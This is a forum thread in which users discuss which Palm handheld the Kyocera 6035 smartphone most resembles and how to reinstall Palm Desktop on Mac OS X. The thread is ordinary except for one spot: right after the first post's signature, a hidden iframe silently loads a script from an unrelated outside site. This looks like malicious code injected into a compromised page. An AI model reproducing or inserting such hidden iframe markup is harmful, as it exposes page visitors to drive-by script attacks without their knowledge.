+ Reply to Thread

What Palm Model is Comp. to 6035? ...

This has probably been mentioned by someone at somepoint, but my search turned up nothing. I Tried!:angel

THE BACKGROUND
    I'm reinstalling the Palm Desktop SW on my Mac, which got completely lobotomized in the upgrade to OS 10.2 (Jaguar). I have a copy of the Palm Desktop Installer that I used before, but it's become corrupted and won't install. So I trundled over to grudgingly download another copy from home over my slow modem but to get to the file, along with the usual registration, name rank serial number, etc, :p I'm faced with a question I don't know how to answer:

"Which Model Palm are you using?"

(Somehow the choice I was looking for from the provided drop-down list:
    "Well, none, actually. I'm using a Kyocera 6035, thank you for asking."
    wsan't available....I'm sure it's a temporary server error... )

At first I was freaked out - I thought "if I don't come up with the closest match, I'll waste all day downloading the wrong version of the desktop software, and my phone, cradle, usb adaptor and computer will all instantly melt into a puddle."

Checking a little more carefully, they list two files, ("With Notepad," and "without Onions, er, I mean Notepad," with specific file sizes for each, so I'm assuming that at worst my chances are 50/50 of causing a meltdown.

THE POINT
    But even if the palm desktop software hasn't been customized to the point of being model/feature specific, it's making me wonder to which Palm model/type is the 6035 is most comparable? I'm sure this has some applicability - such as to the add-on software that would be stable.

Can anybody provide a positive ID, or maybe run down the similarities & differences between a couple of Palm types and the 6035 if that's more appropriate?

Thanks, cheers!
    -barnz<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Mod-Blog's SmartPhone Correspondent

Re: What Palm Model is Comp. to 6035? ...

I'm reinstalling the Palm Desktop SW on my Mac, which got completely lobotomized in the upgrade to OS 10.2 (Jaguar).

Really?! I thought I was the only one. I just (finally) upgraded from 10.1.5 to 10.2.1 and... well... it was not as smooth as it could have been. I am fairly sure Norton Utilites (essential on MacOS 9, deadly on MacOS X) nuked me and in the end I now have a completely wiped hard drive. I backed up with Dantz Retrospect, so I should be able to recover, but let's just say things were not happy in the lab this weekend. I was tempted to launch that doomsday device I had been saving for a special occasion. But the last one turned out to have been a misprint for "Dunes-Day Device" and I wound up on the beach in Malibu somehow.

"Which Model Palm are you using?"
    ...But even if the palm desktop software hasn't been customized to the point of being model/feature specific, it's making me wonder to which Palm model/type is the 6035 is most comparable?

The Kyo6035 should be most similar to the Palm III series of handhelds - probably the Palm IIIe, Palm IIIx, or Palm IIIxe are the closest. (Disclaimer: This is from examining basic specs and software abilities - not from an exhaustive examination of the innards or reading up on it).

But that being said, they all use the same Desktop Software on a Mac or a PC. Should be fairly safe for you to install whatever comes up and sync without problems.

FYI, I try to export my contacts to VCF (vCard) files (also compatible with Apple's Address Book) regularly so that I do not lose those critical pieces of software. Worth doing and sticking onto a CD or ZIP disk every month or so. Calendar files have a similar format called .ics, which is also compatible with Apple's new iCal software. :angel

The 6035 is closest to the Palm IIIxe or Palm Vx. Definitely something older than the current generation Palm PDAs. The Notepad application you mention is only available on the newer models from what I've read.
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

Administrator
    Originally posted by alex_mathews
    The 6035 is closest to the Palm IIIxe or Palm Vx. Definitely something older than the current generation Palm PDAs. The Notepad application you mention is only available on the newer models from what I've read.
    seems to be the story i have heard over the course of the 6035's exisitence...

be careful using the palm version of the desktop software. I remember reading a warning sticker on my SW installation disk from Kyocera that warned of preferences in the 6035 that would not be available in other palm devices (mine is a handspring prism) and advised the user to move the palm preferences out of the way before installing. if anyone reading also remembers this and still has thier SW could you post the text of the warning. my thought is that sW for the palm may overwrite your prefs and leave you without somethings. don't know if it's the case tho.

kyocera offers the desktop SW for download from thier website

My phone came with Desktop Palm software. Seems I can't install 2.0 on my computer.

Administrator
    you can use palm desktop 4.1 which is now available on the palm site...

re: 2.0? whats this? :drink3

I thought my new 6035 was just like my previous palm M105
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Originally posted by tjspinks
    be careful using the palm version of the desktop software. I remember reading a warning sticker on my SW installation disk from Kyocera that warned of preferences in the 6035 that would not be available in other palm devices (mine is a handspring prism) and advised the user to move the palm preferences out of the way before installing. if anyone reading also remembers this and still has thier SW could you post the text of the warning. my thought is that sW for the palm may overwrite your prefs and leave you without somethings. don't know if it's the case tho.
    That isn't a feature of the desktop software - There is no difference that I've been able to tell.

Problems can arise if you are transferring from another Palm device to the 6035 - You have to delete one of the settings PDBs saved from the old device or it'll screw up the 6035.

Registered User All-Purpose Guru's Avatar

6035 similarities

Actually, the 6035 is closest to the Palm IIIc color handheld. This is due to the video architecture, which has a separate controller as in the IIIc. You will also find that old apps that programmed the video controller directly (most of which don't exist any more because they were updated when the OS grew new features) will fail on the IIIc just as on the 6035.

That said, the Kyo is fundamentally different from ALL of them. The IIIc is the best choice for similarity.

With regard to the Palm Desktop software-- Palm is pretty careful to NOT make the desktop incompatible with the handhelds. Indeed, the only differences between the different versions is whether or not the shortcuts for the new applications (such as Notepad) are visible or hidden.

It is HIGHLY recommended that you upgrade to Palm Desktop 4.x from the desktop Kyocera gives you-- the newer Palm Desktop actually supports the 6035 better than the Kyocera software anyway.

--apg